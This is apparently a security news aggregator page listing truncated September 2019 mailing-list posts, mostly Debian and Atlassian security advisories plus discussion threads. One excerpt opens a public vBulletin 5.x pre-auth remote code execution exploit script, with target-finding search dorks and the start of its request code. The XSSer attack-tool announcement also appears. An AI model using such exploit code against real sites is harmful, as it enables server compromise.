Security News

"For the Glory of the State Machine"

Daily Dave - 25 September, 2019 - 08:43

Posted by Dave Aitel on Sep 25

So for the past while I've been obsessed with HTTP Desync Attacks
<https://www.youtube.com/watch?v=-y82LadA7N4>. A lot of people call this
"http request smuggling" which is a dumb name in a few ways, most
specifically because it restricts the bug class (and hence your mindset)
down to the smallest possible point. To be fair, in my head I call them
Parser State Mismatch bugs.

The way I look at this bug class is that no two...

Bitbucket Server security advisory 2019-09-18

Bug Traq - 25 September, 2019 - 06:02

Posted by Atlassian on Sep 25

This email refers to the advisory found at
https://confluence.atlassian.com/x/Czc4Og .

CVE ID:

* CVE-2019-15000.

Product: Bitbucket Server and Bitbucket Data Center.

Affected Bitbucket Server and Bitbucket Data Center product versions:

version < 5.16.10
6.0.0 <= version < 6.0.10
6.1.0 <= version < 6.1.8
6.2.0 <= version < 6.2.6
6.3.0 <= version < 6.3.5
6.4.0 <= version < 6.4.3
6.5.0 <= version < 6.5.2...

Jira Security Advisory - 2019-09-18 - CVE-2019-15001

Bug Traq - 25 September, 2019 - 05:58

Posted by Atlassian on Sep 25

This email refers to the advisory found at
https://confluence.atlassian.com/x/KkU4Og .

CVE ID:

* CVE-2019-15001.

Product: Jira Server and Data Center.

Affected Jira Server and Data Center product versions:

7.0.10 <= version < 7.6.16
7.7.0 <= version < 7.13.8
8.0.0 <= version < 8.1.3
8.2.0 <= version < 8.2.5
8.3.0 <= version < 8.3.4
8.4.0 <= version < 8.4.1

Fixed Jira Server and Data Center product...

[SECURITY] [DSA 4531-1] linux security update

Bug Traq - 25 September, 2019 - 04:57

Posted by Salvatore Bonaccorso on Sep 25

-------------------------------------------------------------------------
Debian Security Advisory DSA-4531-1 security () debian org
https://www.debian.org/security/ Salvatore Bonaccorso
September 25, 2019 https://www.debian.org/security/faq
-------------------------------------------------------------------------

Package : linux
CVE ID : CVE-2019-14821 CVE-2019-14835...

[SECURITY] [DSA 4532-1] spip security update

Bug Traq - 25 September, 2019 - 04:53

Posted by Sebastien Delafond on Sep 25

-------------------------------------------------------------------------
Debian Security Advisory DSA-4532-1 security () debian org
https://www.debian.org/security/ Sebastien Delafond
September 25, 2019 https://www.debian.org/security/faq
-------------------------------------------------------------------------

Package : spip
CVE ID : CVE-2019-16391 CVE-2019-16392...

vBulletin 5.x 0day pre-auth RCE exploit

Full Disclosure - 24 September, 2019 - 11:43

Posted by i0su9z+32fpome4pivgiwtzjw--- via Fulldisclosure on Sep 24

#!/usr/bin/python
#
# vBulletin 5.x 0day pre-auth RCE exploit
#
# This should work on all versions from 5.0.0 till 5.5.4
#
# Google Dorks:
# - site:*.vbulletin.net
# - "Powered by vBulletin Version 5.5.4"

import requests
import sys

if len(sys.argv) != 2:
    sys.exit("Usage: %s <URL to vBulletin>" % sys.argv[0])

params = {"routestring":"ajax/render/widget_php"}

while True:
    try:
        cmd...

XSSer v.1.8[1] - "The Hive!" released

Full Disclosure - 24 September, 2019 - 11:41

Posted by psy on Sep 24

Hi FD,

I am glad to present a new release of this tool:

- https://xsser.03c8.net

---------

"Cross Site "Scripter" (aka XSSer) is an automatic -framework- to
detect, exploit and report XSS vulnerabilities in web-based
applications. It provides several options to try to bypass certain
filters and various special techniques for code injection."

---------

XSSer has pre-installed [ > 1300 XSS ] attacking vectors and can...

Re: CVSS is the worst compression algorithm ever

Daily Dave - 24 September, 2019 - 10:30

Posted by Christian Heinrich on Sep 24

Konrad,

Sasha Romanosky and CMU are also listed within the latest minor
release (CVSS v3.1) at
https://www.first.org/cvss/v3.1/specification-document#Appendix-B---Acknowledgments
dated 11 July 2019 as announced at
https://twitter.com/FIRSTdotOrg/status/1149501455553851393 too.

Bug Bounty Competition 2019

Full Disclosure - 23 September, 2019 - 07:50

Posted by Vulnerability Lab on Sep 23

Hello whitehats and bugbounty hunters,
today we would like to invite especially you for the Hack in the Box
Driven2PWN Bug Bounty Competition in Abu Dhabi (UAE) during the 12-17th
October 2019. Please feel free to register through the official service
page and get a fly to the bug bounty competition
(https://d2p.cyberweek.ae/).

Register as individual researcher or ethical whitehat hacker team.

Competition: https://d2p.cyberweek.ae/
Target...

Jira Service Desk Server and Jira Service Desk Data Center - URL path traversal allows information disclosure - CVE-2019-14994

Bug Traq - 23 September, 2019 - 02:58

Posted by Brian Adeloye on Sep 23

This email refers to the advisory found at
https://confluence.atlassian.com/jira/jira-service-desk-security-advisory-2019-09-18-976171274.html

CVE ID:

* CVE-2019-14994.

Product: Jira Service Desk Server and Data Center.

Affected Jira Service Desk Server and Data Center product versions:

version < 3.9.16
3.10.0 <= version < 3.16.8
4.0.0 <= version < 4.1.3
4.2.0 <= version < 4.2.5
4.3.0 <= version < 4.3.4
4.4.0 <=...

[SECURITY] [DSA 4529-1] php7.0 security update

Bug Traq - 23 September, 2019 - 02:54

Posted by Moritz Muehlenhoff on Sep 23

-------------------------------------------------------------------------
Debian Security Advisory DSA-4529-1 security () debian org
https://www.debian.org/security/ Moritz Muehlenhoff
September 20, 2019 https://www.debian.org/security/faq
-------------------------------------------------------------------------

Package : php7.0
CVE ID : CVE-2019-11034 CVE-2019-11035...

[SECURITY] [DSA 4530-1] expat security update

Bug Traq - 23 September, 2019 - 02:50

Posted by Salvatore Bonaccorso on Sep 23

-------------------------------------------------------------------------
Debian Security Advisory DSA-4530-1 security () debian org
https://www.debian.org/security/ Salvatore Bonaccorso
September 22, 2019 https://www.debian.org/security/faq
-------------------------------------------------------------------------

Package : expat
CVE ID : CVE-2019-15903
Debian Bug :...

Reflected XSS – HRworks Login (v1.16.1)

Full Disclosure - 20 September, 2019 - 13:08

Posted by Georg Ph E Heise via Fulldisclosure on Sep 20

# Exploit Title: Reflected XSS – HRworks Login (v1.16.1)
# Vendor Homepage: https://www.hrworks.de
# Exploit Author: Georg Philipp Erasmus Heise / Lufthansa Industry Solutions
# Contact: https://twitter.com/gpheheise
# Website: https://www.lufthansa-industry-solutions.com
# Category: webapps
# CVE: CVE-2019-11559

Timeline

26.04.2019 Disclosure to Vendor
29.04.2019 Vendor informed that the issue was remediated
17.09.2019 Publication...

[SECURITY] [DSA 4526-1] opendmarc security update

Bug Traq - 20 September, 2019 - 03:16

Posted by Salvatore Bonaccorso on Sep 20

-------------------------------------------------------------------------
Debian Security Advisory DSA-4526-1 security () debian org
https://www.debian.org/security/ Salvatore Bonaccorso
September 19, 2019 https://www.debian.org/security/faq
-------------------------------------------------------------------------

Package : opendmarc
CVE ID : CVE-2019-16378
Debian Bug :...

[SECURITY] [DSA 4527-1] php7.3 security update

Bug Traq - 20 September, 2019 - 03:13

Posted by Moritz Muehlenhoff on Sep 20

-------------------------------------------------------------------------
Debian Security Advisory DSA-4527-1 security () debian org
https://www.debian.org/security/ Moritz Muehlenhoff
September 19, 2019 https://www.debian.org/security/faq
-------------------------------------------------------------------------

Package : php7.3
CVE ID : CVE-2019-11036 CVE-2019-11039...

[SECURITY] [DSA 4528-1] bird security update

Bug Traq - 20 September, 2019 - 03:09

Posted by Moritz Muehlenhoff on Sep 20

-------------------------------------------------------------------------
Debian Security Advisory DSA-4528-1 security () debian org
https://www.debian.org/security/ Moritz Muehlenhoff
September 19, 2019 https://www.debian.org/security/faq
-------------------------------------------------------------------------

Package : bird
CVE ID : CVE-2019-16159

Daniel McCarney...

[SECURITY] [DSA 4525-1] ibus security update

Bug Traq - 19 September, 2019 - 01:49

Posted by Salvatore Bonaccorso on Sep 18

-------------------------------------------------------------------------
Debian Security Advisory DSA-4525-1 security () debian org
https://www.debian.org/security/ Salvatore Bonaccorso
September 18, 2019 https://www.debian.org/security/faq
-------------------------------------------------------------------------

Package : ibus
CVE ID : CVE-2019-14822
Debian Bug :...

SEC Consult SA-20190918-0 :: Reflected Cross-Site Scripting (XSS) in Oracle Mojarra JSF

Bug Traq - 18 September, 2019 - 09:03

Posted by SEC Consult Vulnerability Lab on Sep 18

SEC Consult Vulnerability Lab Security Advisory < 20190918-0 >
=======================================================================
title: Reflected Cross-Site Scripting (XSS)
product: Oracle Mojarra JSF included in Java EE 7
Eclipse Mojarra JSF
vulnerable version: 2.2 & 2.3
fixed version: https://github.com/javaserverfaces/mojarra/commits/MOJARRA_2_2X_ROLLING...

SEC Consult SA-20190918-0 :: Reflected Cross-Site Scripting (XSS) in Oracle Mojarra JSF

Full Disclosure - 18 September, 2019 - 06:06

Posted by SEC Consult Vulnerability Lab on Sep 18

SEC Consult Vulnerability Lab Security Advisory < 20190918-0 >
=======================================================================
title: Reflected Cross-Site Scripting (XSS)
product: Oracle Mojarra JSF included in Java EE 7
Eclipse Mojarra JSF
vulnerable version: 2.2 & 2.3
fixed version: https://github.com/javaserverfaces/mojarra/commits/MOJARRA_2_2X_ROLLING...

Re: Longer form questions

Daily Dave - 17 September, 2019 - 16:03

Posted by Andre Gironda on Sep 17

Daemonlogger + Zeek Intelligence Framework for sightings. Doesn't need TLS
secrets. Doesn't need high availability or to run inline. The sensors tell
you what they see and where and when they saw it. No need to block. No need
to "detect". No signatures at all (just a living watchlist). No AI/ML. No
modification of traffic. No huge concern if an APT, skiddie, or admin
crashes it (it's receive-only on the Daemonlogger...